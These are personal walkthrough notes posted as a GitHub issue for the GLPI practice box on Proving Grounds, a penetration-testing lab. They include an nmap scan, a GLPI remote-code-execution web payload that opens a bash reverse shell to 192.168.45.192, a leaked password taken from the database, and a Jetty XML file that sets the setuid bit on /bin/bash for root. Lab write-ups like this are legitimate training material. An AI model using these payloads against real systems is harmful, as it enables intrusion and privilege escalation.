search

WDavid404 / PG-Box

PG box workthough note
0 stars 0 forks source link

GLPI (easy) #2

Open WDavid404 opened 4 months ago

WDavid404 commented 4 months ago 
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: C01D32D71C01C8426D635C68C4648B09
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Authentication - GLPI
|_http-server-header: Apache/2.4.41 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host

http://192.168.249.242/files/_log/sql-errors.log --> {"user":"7@ubuntu-focal"} "user":"2@ubuntu-focal"

image --> 10.0.2 is the version of GLPI ?

searchsploit GLPI 10.0.2 -->found 51223 but it didn't work...

finally, i found a good article.... https://senderend.medium.com/pg-practice-box-deep-dive-glpi-c3a1cf1520f8

text=call_user_func&hhook=array_map&hfoo=system&spec[0]=&spec[1]=bash+-c+%27bash+-i+>%26+/dev/tcp/192.168.45.192/80+0>%261%27&sid=bs image

can find betty's password in glpi_itilfollowups table SnowboardSkateboardRoller234

echo '<?xml version="1.0"?>
<!DOCTYPE Configure PUBLIC "-//Jetty//Configure//EN" "https://www.eclipse.org/jetty/configure_10_0.dtd">
<Configure class="org.eclipse.jetty.server.handler.ContextHandler">
<Call class="java.lang.Runtime" name="getRuntime">
<Call name="exec">
<Arg>
<Array type="String">
<Item>/bin/bash</Item>
<Item>-c</Item>
<Item>chmod +s /bin/bash</Item>
</Array>
</Arg>
</Call>
</Call>
</Configure>' > run.xml 
then, 
bash -p

image

Note:
<Item>/tmp/run.sh</Item> doesn't work.. don't know why...